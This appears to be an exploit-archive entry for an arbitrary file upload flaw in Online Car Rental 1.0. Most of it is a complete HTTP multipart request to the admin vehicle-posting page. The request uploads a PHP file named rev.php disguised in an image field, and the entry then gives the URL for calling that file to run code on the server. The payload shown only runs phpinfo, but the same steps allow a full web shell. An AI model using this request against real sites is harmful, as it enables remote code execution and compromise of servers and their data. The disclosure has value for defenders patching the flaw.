Online Car Rental 1.0 Shell Upload

Online Car Rental 1.0 Shell Upload: Posted Feb 10, 2021; Authored by Richard Jones; Online Car Rental version 1.0 suffers from a remote shell upload vulnerability.; tags | exploit, remote, shell; SHA-256 | ef52bc0d2606bcba1852493116ccff6b1292008b1eeb3dc86915400ea5d0720e; Download | Favorite | View

Online Car Rental 1.0 Shell Upload

# Exploit Title: Online Car Rental 1.0 | Arbitrary file upload
# Exploit Author: Richard Jones
# Date: 2021/09/02
# Vendor Homepage: https://www.sourcecodester.com/cc/14145/online-car-rental-system-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14145&title=Online+Car+Rental+System+Using+PHP%2FMySQL+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34



POST /Online%20Car%20Rental/admin/post-avehical.php HTTP/1.1
Host: TARGETURL
Content-Type: multipart/form-data; boundary=---------------------------41518493223397502791049196241
Content-Length: 1819
Cookie: PHPSESSID=8ouf7h44qe55bk4eqai1p145o1
Upgrade-Insecure-Requests: 1

-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="vehicletitle"

a
-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="brandname"

2
-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="vehicalorcview"

a
-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="priceperday"

1
-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="fueltype"

Petrol
-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="modelyear"

1
-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="seatingcapacity"

1
-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="img1"; filename="rev.php"
Content-Type: application/octet-stream

<?php phpinfo(); ?>
-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="img2"; filename="Untitled.png"
Content-Type: image/png

-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="img3"; filename="Untitled.png"
Content-Type: image/png

-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="img4"; filename="Untitled.png"
Content-Type: image/png

-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="img5"; filename=""
Content-Type: application/octet-stream


-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="submit"


-----------------------------41518493223397502791049196241--


# Call malicious file at: http://TARGETURL/Online%20Car%20Rental/admin/img/vehicleimages/rev.php

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Online Car Rental 1.0 Shell Upload

Online Car Rental 1.0 Shell Upload

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Online Car Rental 1.0 Shell Upload

Share This

Online Car Rental 1.0 Shell Upload

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems